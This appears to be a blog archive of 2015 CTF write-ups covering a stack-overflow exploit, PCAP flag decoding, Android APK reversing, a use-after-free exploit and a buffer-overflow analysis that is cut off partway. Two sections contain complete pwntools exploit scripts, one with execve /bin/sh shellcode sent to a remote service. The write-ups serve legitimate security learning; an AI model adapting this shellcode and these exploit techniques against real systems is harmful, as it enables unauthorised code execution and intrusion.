Sunday, September 27, 2015

CSAW 2015 Quals: Exploitable 100 - Precision write-up

I worked on this challenge during the "CSAW 2015" as part of a CTF team called seven.

We are given a binary and need to exploit it on the remote system to get the flag.
First things first, let's check what type of protection we are dealing with.

# file precision_a8f6f0590c177948fe06c76a1831e650
precision_a8f6f0590c177948fe06c76a1831e650: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xf2c69f92c3f6d68319ee39c0926e84bccdeb0371, not stripped

# /opt/checksec.sh --file precision_a8f6f0590c177948fe06c76a1831e650
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   precision_a8f6f0590c177948fe06c76a1831e650

Seems like no protection at all... sine NX is disabled, it's probably a sack based attack (e.g. overflow).
Surely enough, running the application a few times gives more insight into what we should do.

# ./precision_a8f6f0590c177948fe06c76a1831e650
Buff: 0xbfd01a48
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Got AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

# ./precision_a8f6f0590c177948fe06c76a1831e650
Buff: 0xbf83e488
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nope

Looks like an ordinary echo app that just prints back whatever we type in. However, interestingly we get something that looks very much like an address on the stack (0xbf83e488).
This could be the address of the input buffer on the stack - but we'll need to confirm that to be sure.
Another interesting thing is that if we provide a long enough input, we get the message "Nope" instead of our original input.
Time to peek under the hood.

.text:0804851D ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:0804851D                 public main
.text:0804851D main            proc near               
.text:0804851D
.text:0804851D argc            = dword ptr  8
.text:0804851D argv            = dword ptr  0Ch
.text:0804851D envp            = dword ptr  10h
.text:0804851D
.text:0804851D                 push    ebp
.text:0804851E                 mov     ebp, esp
.text:08048520                 and     esp, 0FFFFFFF0h
.text:08048523                 sub     esp, 0A0h
.text:08048529                 fld     ds:dbl_8048690
.text:0804852F                 fstp    qword ptr [esp+98h]
.text:08048536                 mov     eax, ds:stdout@@GLIBC_2_0
.text:0804853B                 mov     dword ptr [esp+0Ch], 0 ; n
.text:08048543                 mov     dword ptr [esp+8], 2 ; modes
.text:0804854B                 mov     dword ptr [esp+4], 0 ; buf
.text:08048553                 mov     [esp], eax      ; stream
.text:08048556                 call    _setvbuf
.text:0804855B                 lea     eax, [esp+18h]
.text:0804855F                 mov     [esp+4], eax
.text:08048563                 mov     dword ptr [esp], offset format ; "Buff: %p\n"
.text:0804856A                 call    _printf
.text:0804856F                 lea     eax, [esp+18h]
.text:08048573                 mov     [esp+4], eax
.text:08048577                 mov     dword ptr [esp], offset aS ; "%s"
.text:0804857E                 call    ___isoc99_scanf
.text:08048583                 fld     qword ptr [esp+98h]
.text:0804858A                 fld     ds:dbl_8048690
.text:08048590                 fucomip st, st(1)
.text:08048592                 fstp    st
.text:08048594                 jp      short loc_80485A9
.text:08048596                 fld     qword ptr [esp+98h]
.text:0804859D                 fld     ds:dbl_8048690
.text:080485A3                 fucomip st, st(1)
.text:080485A5                 fstp    st
.text:080485A7                 jz      short loc_80485C1
.text:080485A9
.text:080485A9 loc_80485A9:                            
.text:080485A9                 mov     dword ptr [esp], offset s ; "Nope"
.text:080485B0                 call    _puts
.text:080485B5                 mov     dword ptr [esp], 1 ; status
.text:080485BC                 call    _exit
.text:080485C1 ; ---------------------------------------------------------------------------
.text:080485C1
.text:080485C1 loc_80485C1:                            
.text:080485C1                 mov     eax, str
.text:080485C6                 lea     edx, [esp+18h]
.text:080485CA                 mov     [esp+4], edx
.text:080485CE                 mov     [esp], eax      ; format
.text:080485D1                 call    _printf
.text:080485D6                 leave
.text:080485D7                 retn
.text:080485D7 main            endp
It looks like we have some sort of primitive version of a stack cookie!
After taking the input, the app check if the stack still contains the value 64.33333 (which is located at dbl_8048690).
The value seems to be: 0x475a31a5 0x40501555

And indeed, the leaked address is the address of our buffer on the stack. Guess we don't need to worry about ASLR  :)
Let's take a look at the stack

bfa8:a960|b775bb58|X.u.|
bfa8:a964|00000001|....|
bfa8:a968|00000000|....|
bfa8:a96c|00000001|....|
bfa8:a970|b777d908|..w.|
bfa8:a974|b75db8d0|..].|
bfa8:a978|bfa8aa84|....|
bfa8:a97c|bfa8c6c4|....|ASCII "precision_a8f6f0590c177948fe06c76a1831e650"
bfa8:a980|b76b2a37|7*k.|return to b76b2a37
bfa8:a984|b760b315|..`.|return to b760b315
bfa8:a988|0000002f|/...|
bfa8:a98c|b773bff4|..s.|
bfa8:a990|00000000|....|
bfa8:a994|bfa8aa30|0...|
bfa8:a998|b773cce0|..s.|
bfa8:a99c|08048385|....|return to 08048385
bfa8:a9a0|b776e590|..v.|
bfa8:a9a4|08048420| ...|
bfa8:a9a8|0804a000|....|
bfa8:a9ac|08048632|2...|return to 08048632
bfa8:a9b0|00000001|....|
bfa8:a9b4|bfa8aa84|....|
bfa8:a9b8|bfa8aa8c|....|
bfa8:a9bc|bfa8a9d8|....|
bfa8:a9c0|b760b515|..`.|return to b760b515
bfa8:a9c4|b776e590|..v.|
bfa8:a9c8|475a31a5|.1ZG|    <================================== This is the stack cookie
bfa8:a9cc|40501555|U.P@|    <================================== This is the stack cookie
bfa8:a9d0|080485e0|....|
bfa8:a9d4|00000000|....|
Since NX is not enabled for the stack, we can execute the shellcode once it is put on the stack. 
We only need to:
  1. keep in mind that at offset 152 we have a stack cookie which we must not overwrite with something else
  2. jump to the buffer (payload) address on stack and execute our shellcode
  3. find a shellcode that is getting past _isoc99_scanf

The first two steps are nothing new - I my past posts I have shown how to easily find the offset on which the jump address (step 2) needs to be, so I will not repeat it this time...
A more interesting dilemma is step 3!
I tried generating numerous shellcodes with msfvenom, only to find that my shellcode get's split at various bad characters like: 0x0b, 0x09, 0x20, and many more.
After a lot of trial and error, I finally got this exploit to get pass the _isoc99_scanf function.
After putting it all together, we get the following exploit script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from struct import pack, unpack

MAGIC_VALUE_1 = 0x475a31a5
MAGIC_VALUE_2 = 0x40501555

shellcode="\x31\xc0\xb0\x30\x01\xc4\x30\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\xb0\xb0\xc0\xe8\x04\xcd\x80\xc0\xe8\x03\xcd\x80"

conn = remote("localhost", 4444) 
# conn = remote("54.173.98.115", 1259) 

recieved = conn.recvuntil("\n")
buffer_address = int(recieved[6:], 16)
log.info("Recieved: " + recieved)
log.info("Buffer is at %s" % hex(buffer_address))
esp = buffer_address - 0x18
log.info("ESP is: %s" % hex(esp))
magic_value_address = esp + 0x98
log.info("Magic value is at: %s" % hex(magic_value_address))
log.info("Shellcode length: %s" % len(shellcode))
shellcode_address = buffer_address + 152 + 24
#shellcode_address = shellcode_address-0xa0
log.info("Shellcode is at: %s" % hex(shellcode_address))

payload = shellcode + "A" * (152-24-len(shellcode)) +str(p32(MAGIC_VALUE_1))  + str(p32(MAGIC_VALUE_2)) + "B" * 12 + str(p32(buffer_address))
# payload = "A" * 10

log.info("Sending payload")
conn.sendline(payload)
conn.interactive()

Friday, September 25, 2015

CSAW 2015 Quals: Forensic 100 - Transfer write-up

I worked on this challenge during the "CSAW 2015" as part of a CTF team called seven.

We get a PCAP and need to find the hidden flag.
Looking at the traffic in the PCAP, there doesn't seem to be anything interesting ... a bunch of HTTP requests (some HTTPS, hence the TLS).


Seeing as how there were numerous requests towards Google, Facebook, Twitter, csaw.engineering.nyu.edu, and other sites... I tried the next logical thing and took a look at the files that were transferred. This is easily done using Wiresharks file export feature.

Sure enough, there are quite bit of files to be seen. Here is a summary based on only the names and sizes of the files retrieved.


  • 4 files roughly 153KB in size, having the name %5c - probably the HTML source of the sites that were visited
  • 4 files roughly 24KB in size having the same name %5c - probably some CSS/JavaScript that came with the HTML source
  • 123 files roughly 1KB in size having the name object<number> - no idea what that would be...
  • 8 files roughly 1KB in size having the name %5c- probably various redirects (would make sense based on the 4+4 sites that were visited)
Looking at the files named %5c it's easy enough to confirm the above assumptions without taking to much time. Now for the hard part ... analyzing the many object<number> files ...


Luckily, opening up the very first one (in my case it's called object60) reviles a Python script!


import string
import random
from base64 import b64encode, b64decode

FLAG = 'flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}'

enc_ciphers = ['rot13', 'b64e', 'caesar']
# dec_ciphers = ['rot13', 'b64d', 'caesard']

def rot13(s):
 _rot13 = string.maketrans( 
     "ABCDEFGHIJKLMabcdefghijklmNOPQRSTUVWXYZnopqrstuvwxyz", 
     "NOPQRSTUVWXYZnopqrstuvwxyzABCDEFGHIJKLMabcdefghijklm")
 return string.translate(s, _rot13)

def b64e(s):
 return b64encode(s)

def caesar(plaintext, shift=3):
    alphabet = string.ascii_lowercase
    shifted_alphabet = alphabet[shift:] + alphabet[:shift]
    table = string.maketrans(alphabet, shifted_alphabet)
    return plaintext.translate(table)

def encode(pt, cnt=50):
 tmp = '2{}'.format(b64encode(pt))
 for cnt in xrange(cnt):
  c = random.choice(enc_ciphers)
  i = enc_ciphers.index(c) + 1
  _tmp = globals()[c](tmp)
  tmp = '{}{}'.format(i, _tmp)

 return tmp

if __name__ == '__main__':
 print encode(FLAG, cnt=?)

Well this looks promising! :)
It looks like a simple encoder/decoder, and it even has the flag template flag{xxx} embedded in it. There are four distinct functions here:

  • rot13 - a simple substitution cipher that replaces a letter with the letter 13 letters after it in the alphabet
  • b64e - a function that simply encodes a string to Base64
  • caesar - another simple substitution cipher that replaces a letter with the letter 3 letters after it in the alphabet
  • encode - this seams to be the master function which is used to encrypt the flag (notice a call to the encrypt function at the main part of the script!). It seems to first encode the flag into Base64, but first it ads the number 2 before the encoded string is concatenated. The number 2 seems to align with the index of the b64e function in the enc_ciphers variable. The rest of the function seems to randomly pick a function from the enc_ciphers variable and then apply the chosen algorithm to the entire string, thus forming a new one. Each time, the index of the used algorithm is added before the string. 

Obviously, we now have a way of decrypting the encrypted flag - we just need to find the string which was encoded. Looking at the rest of the object files, we see a bunch of seemingly random letters:

2Mk16Sk5iakYxVFZoS1RsWnZXbFZaYjFaa1prWmFkMDVWVGs1U2IyODFXa1ZuTUZadU1YVldiVkphVFVaS1dGWXlkbUZXTVdkMVprWnJWMlZHYzFsWGJscHVVekpOWVZaeFZsUmxWMnR5VkZabU5HaFdaM1pYY0hkdVRXOWFSMVJXYTA5V1YwcElhRVpTVm1WSGExUldWbHBrWm05dk5sSnZVbXhTVm5OWVZtNW1NV1l4V1dGVWJscFVaWEJoVjF

This seems to be our encrypted flag scattered across a bunch of files. As we can see, the number 2 at the beginning makes the first file (the one with the smallest number in object<number>) the first part of the encrypted string. 

First we need to create two decryption functions: b64d, caesard.
b64d is simple - we just call Python's b64decode to decode the Base64 string back to it's original form.
caesard is also simple - we just use a -3 offset to revert the changes of the original caesar cypher

Adding it all together, we get the flag

flag{li0ns_and_tig3rs_4nd_b34rs_0h_mi}

Here is the Python script I used - enjoy ! :)

import string
from base64 import b64decode
import os

mypath = "D:\CTFs/CSAW_2015/forensic/100/files/"
files = [ f for f in os.listdir(mypath) if os.path.isfile(os.path.join(mypath,f)) ]

encodedParts = []
for file in files:
 if "object" in file:
  encodedParts.append(int(file[6:]))

encodedParts = sorted(encodedParts)

# remove first element since it is the script itself ...
encodedParts.pop(0) 
# print encodedParts

encodedFlag = ""
for file in encodedParts:
 pathToFile = mypath + "object" + str(file)
 encodedFlag += open(pathToFile, "r").read()
 
# print encodedFlag

dec_ciphers = ['rot13', 'b64d', 'caesard']

def rot13(s):
 _rot13 = string.maketrans( 
     "ABCDEFGHIJKLMabcdefghijklmNOPQRSTUVWXYZnopqrstuvwxyz", 
     "NOPQRSTUVWXYZnopqrstuvwxyzABCDEFGHIJKLMabcdefghijklm")
 return string.translate(s, _rot13)

def b64d(s):
 return b64decode(s)

def caesard(plaintext, shift=-3):
    alphabet = string.ascii_lowercase
    shifted_alphabet = alphabet[shift:] + alphabet[:shift]
    table = string.maketrans(alphabet, shifted_alphabet)
    return plaintext.translate(table)


while(1):
 if (encodedFlag[0] == "1"):
  encodedFlag = rot13(encodedFlag[1:])
 elif (encodedFlag[0] =="2"):
  encodedFlag = b64d(encodedFlag[1:])
 elif (encodedFlag[0] =="3"):
  encodedFlag = caesard(encodedFlag[1:])
 else:
  print "finished..."
  print encodedFlag
  exit()

Sunday, July 12, 2015

PoliCTF 2015: Crack Me If You Can - write-up

I worked on this challenge during the "PoliCTF 2015" as part of a CTF team called seven.

 We get an Android app called crack-me-if-you-can.apk, and are asked to extract the flag/password. First, I tried using apktool and APK Studio to decompile the application. Unfortunately, the APK seems to be corrupt, and the tools will not work!


 I opened the APK with 7Z (remember, APK is actually a ZIP file), and everything seemed to be in place. I tried the online version of the APK Decompiler, and luckily - it worked (thanks guys)!
Looking over the manifest, there does not seem to be anything special. We do however get a glimpse of the namespace (or package in Java) used: it.polictf2015.

<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="it.polictf2015" platformBuildVersionCode="21" platformBuildVersionName="5.0.1-1624448">
    <application android:allowBackup="true" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:theme="@style/AppTheme">
        <activity android:label="@string/app_name" android:name="it.polictf2015.LoginActivity" android:windowSoftInputMode="stateVisible|adjustResize">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <meta-data android:name="com.google.android.gms.version" android:value="@integer/google_play_services_version"/>
    </application>
</manifest>

The actual decompiled source code is in the src folder. Using the namespace above it is easy to navigate to the correct location with four files:
  • a.java - seems irrelevant, probably just a handler
  • b.java - a single class (called b) which has a bunch of methods which take a string and replace certain characters
  • c.java - same as b.java, but with fever methods
  • LoginActivity.java - this is the actual activity which presumably does all the work.
Looking over the source of the LoginActivity, we immediately see this string: flagging{It_cannot_be_easier_than_this}. Could it be this easy?!?!?!?

No... :)
This seems to be a red herring, and the fact that the string is being used as input to the replace function which changes "flagging" to "flag" does not help... :P
Actually, there are a bunch of methods that don't really seem to do much other then confuse use.

The only other method left is this one:

private boolean a(String s)
    {
        if (s.equals(c.a(it.polictf2015.b.a(it.polictf2015.b.b(it.polictf2015.b.c(it.polictf2015.b.d(it.polictf2015.b.g(it.polictf2015.b.h(it.polictf2015.b.e(it.polictf2015.b.f(it.polictf2015.b.i(c.c(c.b(c.d(getString(0x7f0c0038))))))))))))))))
        {
            Toast.makeText(getApplicationContext(), getString(0x7f0c003c), 1).show();
            return true;
        } else
        {
            return false;
        }
    }

This method seems to fetch a string from the resources, and then calls the replace methods embedded in the b and c classes. Even with all the duck typing, it's quite easy to follow the flow used to replace the string. The only thing missing is the actual string!
Looking at the extracted java files, there seems to be no R.java. So how do we get the string which is referenced with 0x7f0c0038?
I tried to search all the XML files in res folder for one of the strings being replaced - but that didn't work unfortunately!

Since apktool reported an error, that could mean some of the resources were not extracted. My last shot was to try and dig through the resources.arsc manually - which is what I did!
Opening the resources.arsc with a HEX editor and searching for the string "spdgj" got me this:


I extracted the whole string and ran the string replacement methods to get the flag: flag{Maybe_This_Obfuscation_Was_Not_That_Good_As_We_Thought}

Bellow it the python script I used for all the string replacements and its output.

eefla{g}{Maybe_This_Obfuscation_Was_Not_That_Good_As_We_Thought}.eeala{g}{Maspdggfdj_This_ObRuscatiot_That_budsgad_As_We_Thought}Te3

my_string = "ee[[c%l][c{g}[%{%Mc%spdgj=]T%aat%=O%bRu%sc]c%ti[o%n=Wcs%=No[t=T][hct%=buga[d=As%=W]e=T%ho[u%[%g]h%t[%}%.ee[[c%l][c{g}[%{%Mc%spdggfdj=]T%aat%=O%bRu%sc]c%ti[o[t=T][hct%=budsga[d=As%=W]e=T%ho[u%[%g]h%t[%}%T[]e3"

my_string = my_string.replace("spdgj", "yb%e")
my_string = my_string.replace("aat", "his")
my_string = my_string.replace("buga", "Goo")

my_string = my_string.replace("=", "_")
my_string = my_string.replace("\\}", "",1)
my_string = my_string.replace("\\{", "",1)
my_string = my_string.replace("R", "f",1)
my_string = my_string.replace("c", "f",1)
my_string = my_string.replace("]", "")
my_string = my_string.replace("[", "")
my_string = my_string.replace("%", "")
my_string = my_string.replace("c", "a")
my_string = my_string.replace("aa", "ca")

print my_stri

Wednesday, June 24, 2015

PlaidCTF Quals 2015 "prodmanager" - practice session write-up

This is another practice session write-up (disclaimer).
Today's challenge is called "prodmanager" and is from PlaidCTF Quals 2015.

You can download the ELF here.


Running the usual stuff first to see if we get anything interesting...

# file prodmanager 
prodmanager: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, stripped

# /opt/checksec.sh --file prodmanager 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   prodmanager

(I will omit strings since there is nothing special to see)

After trying to run the app we see that it requires a file named flag to be in the same folder as the binary. That's probably how it is setup on the target server so makes sense to mimic that locally. I crated a file named flag with the following content:
This_is_My_Pretty_Dummy_flaaaag_!!!!1!

After that the app starts normally and gives us a menu and some info on top. You can play around the app to get a feel of what it does - basically, it creates a list of products (each product has a name and a price) which can be added to a "manager", and you can view the 3 items with the lowest price. The only cryptic functionality is the "create profile", since it does not seem to do/print anything ...

Looking at the disassembly we can see the functions being used in the menu:
  • 0x08048C7B - main menu with the options
  • 0x08048852 - create product
  • 0x08048986 - remove product 
  • etc ...
After browsing around the assembly we see that the products are stored in a doubly linked lists. This being a CTF challenge it look very much like a use-after-free vulnerability (which is the most common vulnerability when dealing with linked lists).

At this point I tried to confirm that this was indeed a use-after-free vulnerability by running a few tests. Since the main menu gives us the ability to manipulate (add & remove) the items in the linked list, and that we can view the content of the list with option no. 4, I quickly found the following PoC:
  1. First create at least 3 products (option no. 1 in main menu)
  2. Add the 3 products from above to the manager (option no. 3 in main menu)
  3. Remove any product (option no. 2 in main menu)
  4. View the lowest 3 products (option no. 4 in main menu)- this is where we see that there is indeed a use-after-free vulnerability

Menu options:
1) Create a new product 
2) Remove a product 
3) Add a product to the lowest price manager 
4) See and remove lowest 3 products in manager 
5) Create a profile (Not complete yet)
Input: 4
Lowest product is Milk
 ($21)
Lowest product is Sugar
 ($-1217022992)
Lowest product is Spice
 ($23)

Now that we know what we are dealing with, we can continue with the analysis. In order to get the flag we need to do the following things:
  1. Find out where and how the flag is being loaded from the filesystem (remember, we know that we need a file named flag in the same directory as the app - we need to inspect where the flag is in memory after it is read)
  2. Analise the structure of the linked list which contains the use-after-free vulnerability (presumably we will need to inject a valid element into the linked list to exploit the use-after-free vulnerability)
  3. Find a valid entry point for the payload (at this point we don't know how to put the payload at the right place in memory)

Step 1 - finding the flag in memory
To make it easier to spot the flag, I changed it to a bunch of A's. From the read function assembly at 0x08048BD4, we can see that the flag is being loaded at offset 0x0804C3E0.
.text:08048C31                 mov     dword ptr [esp+8], offset unk_804C3E0
.text:08048C39                 mov     dword ptr [esp+4], offset aS ; "%s"
.text:08048C41                 mov     eax, [ebp+stream]
.text:08048C44                 mov     [esp], eax
.text:08048C47                 call    ___isoc99_fscanf

Looking at the memory dump, we can see the flag nicely!
0804:c3d0|00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00|................|
0804:c3e0|41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41|AAAAAAAAAAAAAAAA|
0804:c3f0|41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41|AAAAAAAAAAAAAAAA|
0804:c400|41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41|AAAAAAAAAAAAAAAA|
0804:c410|41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41|AAAAAAAAAAAAAAAA|
0804:c420|41 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00|AA..............|
0804:c430|00  

Step 2 - understand the linked list structure
Understandably, there are a lot of functions that operate on the linked list structure in this app. Although we do not see the original struct which was used, we can reverse engineer a rough idea of the struct by looking at how it is being used.


Perhaps the most promising function is located at 0xo8048D54. It appears to be an initialization function which sets the price and the name of the product, and sets 5 other fields to zero. The price seems to be an integer value, while the name is a character array of length 0x32 (50) bytes. Now it would be useful to find out what these other 5 fields are used for.
int struct_init_8048D54(int alloc_space, char *prod_name, int price)
{
  int result; 
  *(_DWORD *)(alloc_space + 4) = 0;  
  *(_DWORD *)(alloc_space + 8) = 0;
  *(_DWORD *)(alloc_space + 12) = 0;
  *(_DWORD *)(alloc_space + 16) = 0;
  *(_DWORD *)(alloc_space + 20) = 0;
  strncpy((char *)(alloc_space + 24), prod_name, 0x32u);  #name
  result = alloc_space;
  *(_DWORD *)alloc_space = price;   #price 
  return result;
}       

The function at offset 0x08048E7F seems to be used to retrieve the pointer to a product which contains a provided name. Looking at the way the list is being iterated i = * (i + 4), it is obvious that at offset 4 (second field) the struct contains a reference to the next struct in the list.
int get_by_name_8048E7F(int linkedList, char *product_name)
{
  int i;
  for ( i = *(_DWORD *)linkedList; i; i = *(_DWORD *)(i + 4) )
  {
    if ( !strncmp((const char *)(i + 24), product_name, 0x32u) )
      return i;
  }
  return 0;
}

So far so good! :)
The function at offset 0x08048E2C is invoked when removing an element from the list. From the function assembly we can easily see that at offset 8 (3rd field) the struct contains a reference to the previous element, which means that this is a doubly linked list.
int remove_from_linked_list_8048E2C(int orig_array, int to_remove)
{
  int result; 
  if ( *(_DWORD *)orig_array == to_remove )     // if to_remove element is equal to first element
    *(_DWORD *)orig_array = *(_DWORD *)(to_remove + 4);// just replace orig with next from to_remove
  else
    *(_DWORD *)(*(_DWORD *)(to_remove + 8) + 4) = *(_DWORD *)(to_remove + 4);// orig.next = to_remove.next
  if ( *(_DWORD *)(orig_array + 4) == to_remove )
  {
    result = orig_array;
    *(_DWORD *)(orig_array + 4) = *(_DWORD *)(to_remove + 8);
  }
  else
  {
    result = *(_DWORD *)(to_remove + 4);
    *(_DWORD *)(result + 8) = *(_DWORD *)(to_remove + 8);
  }
  return result;
}

Looking at the rest of the assembly code dealing with the list I could not make out what the other 3 field actually do. The functions at 0x08048F0 and 0x080494A0 may hold a key to that answer. From the above analysis, we can conclude that the linked list elements look something like this:
alloc_space + 0    # price 
alloc_space + 4    # next   
alloc_space + 8    # previous
alloc_space + 12 
alloc_space + 16 
alloc_space + 20 
alloc_space + 24   #name (50)

Step 3 - find an entry point for the payload
Since we know we are dealing with a use-after-free vulnerability, we need to find a way to introduce our custom payload into the free memory before trigger its (re)use. In order to trick the app into thinking that our payload is a valid struct/element of the linked list, we need to mimic the original struct/element as closely as possible. This is not a problem since we identified how the elements of the list look like in step 2.
Now, we need to find the place where we can introduce the new struct after the memory is being freed. Looking at the create product function at 0x08048852, we see that malloc is being used to allocate 0x4C bytes (which is the size of the struct we identified). Interestingly, this same amount of memory is being allocated in the create profile function at 0x08048B4E! This could be our entry point.

Wrapping up
Now we know how to invoke the vulnerability and insert our payload:
  1. First create at least 3 products (option no. 1 in main menu)
  2. Add the 3 products from above to the manager (option no. 3 in main menu)
  3. Remove product (option no. 2 in main menu)
  4. Create product by and introduce payload (option no. 5 in main menu)
  5. View the lowest 3 products (option no. 4 in main menu)
To make thing easier, I wrote a python script to automate all this overhead we need to get to the actual exploiting... the script is at the bottom if the writeup, as usual.

The only problem now was that I was not sure what the 3 unknown fields in the struct should contain. Also, I was not sure how to spoof valid next and previous values. My first instinct was to remove the first element from the list, create a dummy element whose name element points to the flag (at location 0x0804c3e0). Unfortunately that didn't work so I started fuzzing the create profile parameter in the hopes of finding a clue. I used the bellow pattern as a starting point.

# /usr/share/metasploit-framework/tools/pattern_create.rb 40
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2A

After issuing the string above as input in the create profile function, we get a segmentation fault that says the address 0x41346151 (Qa4A) is not accessible. Now we know the offset which can be used to put the flag address.One thing is however strange... it seems the last byte is increased by 24 - so we need to take this into account when building our payload. To sum up here is what the payload looks like...


payload = p32(6)     # price 
payload += p32(0)    # next   
payload += p32(0)    # prev
payload += p32(0) 
payload += p32(flag_addr - 24)  
payload += p32(0)
payload += "KiKi"  #name (50)

And here is the python script used to exploit!

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from struct import pack, unpack

products = {"Milk" : "21", "Sugar" : "22", "Spice" : "23", "EvNice" : "24"}
to_remove = 1
flag_addr = 0x0804c3e0

def create_products():
 for item in products.keys():
  log.info(conn.recvuntil("Input:"))
  conn.sendline("1")
  
  log.info(conn.recvuntil("Enter product name:"))
  conn.sendline(item)           # product name
  log.info(conn.recvuntil("Enter product price:"))
  conn.sendline(products[item]) # price
  
 
def add_products_to_manager():
 for item in products.keys():
  log.info(conn.recvuntil("Input:"))
  conn.sendline("3")
  
  log.info(conn.recvuntil("Which product name would you like to add:")) 
  conn.sendline(item)
  
def remove_product():
 log.info(conn.recvuntil("Input:"))
 conn.sendline("2")
 
 log.info(conn.recvuntil("Which product name would you like to remove:")) 
 conn.sendline(products.keys()[to_remove])  # product to remove

def create_malicious():
 log.info(conn.recvuntil("Input:"))
 conn.sendline("5")
 
 payload = p32(6)     # price 
 payload += p32(0)    # next   
 payload += p32(0)    # prev
 payload += p32(0) 
 payload += p32(flag_addr - 24)  
 payload += p32(0)
 payload += "KiKi"  #name (50)
 conn.sendline(payload)

def call_malicious():
 log.info(conn.recvuntil("Input:"))
 conn.sendline("4")
 
 log.info(conn.recvuntil("Input:"))
 
conn = remote("localhost", 6667)


create_products()
add_products_to_manager()
remove_product()

create_malicious()

call_malicious()
print conn.recv()



Tuesday, June 23, 2015

Backdoor CTF 2015 "FORGOT" - practice session write-up

This is another practice session write-up (disclaimer).
Today's challenge is called "FORGOT" and is from Backdoor CTF 2015.

You can download the ELF here.


Running the usual stuff first to see if we get anything interesting...

# file forgot
forgot: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x2d0a93353682049b11964e699e753b07c4b8881c, stripped

# /opt/checksec.sh --file forgot
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   forgo

# strings forgot
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
fflush
__isoc99_scanf
puts
stdin
fgets
strlen
stdout
system
__libc_start_main
snprintf
__gmon_start__
GLIBC_2.7
GLIBC_2.0
PTRh
D$8,
D$<@
D$@T
D$Dh
D$H|
|$x 
D$x 
[^_]
Hi %s
   Finite-State Automaton
I have implemented a robust FSA to validate email addresses
Throw a string at me and I will let you know if it is a valid email address
    Cheers!
Dude, you seriously think this is going to work. Where are the fancy @ and [dot], huh?
This all you got? I don't even see an @!
Are you hungry? You just ate the entire part that follows @!
Seems like you work a lot on your localhost, real domains consist of a .[dot]
Sentences end with a [dot], not domains chu!
That is hell of an interesting domain, never seen a top-level domain with a single char.
:) Valid hai!
You just made it. But then you didn't!
./flag
cat %s
What is your name?
I should give you a pointer perhaps. Here: %x
Enter the string to be validate
;*2$"

So this is a dynamically linked binary which has NX enabled - which means we will not be able to run our shellcode from the stack... The strings commands shows a few interesting strings in the binary.
We cross-reference these strings to see when they are being used and get to the following piece of assembly.

.text:080486CC                 push    ebp
.text:080486CD                 mov     ebp, esp
.text:080486CF                 sub     esp, 58h
.text:080486D2                 mov     dword ptr [esp+0Ch], offset a_Flag ; "./flag"
.text:080486DA                 mov     dword ptr [esp+8], offset aCatS ; "cat %s"
.text:080486E2                 mov     dword ptr [esp+4], 32h
.text:080486EA                 lea     eax, [ebp-3Ah]
.text:080486ED                 mov     [esp], eax
.text:080486F0                 call    _snprintf
.text:080486F5                 lea     eax, [ebp-3Ah]
.text:080486F8                 mov     [esp], eax
.text:080486FB                 call    _system
.text:08048700                 leave
.text:08048701                 retn
It looks like the flag is located in a file called flag, and this function is being used to get the flag from the file and sends it to stdout. The strange thing is that this function is never called from anywhere in the rest of the binary... funny.. well, moving on!

After running the binary we see that it asks us to input our name and email address. Trying a few input strings we seem to cause a segmentation fault.
# ./forgot
What is your name?
> aaaaaaaaaaaaaa

Hi aaaaaaaaaaaaaa


   Finite-State Automaton

I have implemented a robust FSA to validate email addresses
Throw a string at me and I will let you know if it is a valid email address

    Cheers!

I should give you a pointer perhaps. Here: 8048654

Enter the string to be validate
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Segmentation fault

This looks very much like a buffer overflow attack. To verify, we simply load the binary in EDB and run a few input strings. The dump bellow is the stack layout after we input "AAAA". It seems we can overflow anything bellow 0xbffbed30.

bffb:ed20|08048e14|....|
bffb:ed24|bffbed30|0...|ASCII "AAAA"
bffb:ed28|b777d440|@.w.|
bffb:ed2c|00000000|....|
bffb:ed30|41414141|AAAA|
bffb:ed34|00000000|....|
bffb:ed38|00000000|....|
bffb:ed3c|00000001|....|
bffb:ed40|b77be908|..{.|
bffb:ed44|b761c8d0|..a.|
bffb:ed48|bffbee54|T...|
bffb:ed4c|bffc0be2|. ..|ASCII "/media/sf_CTFs/backdoor_2015/forgot/forgot"
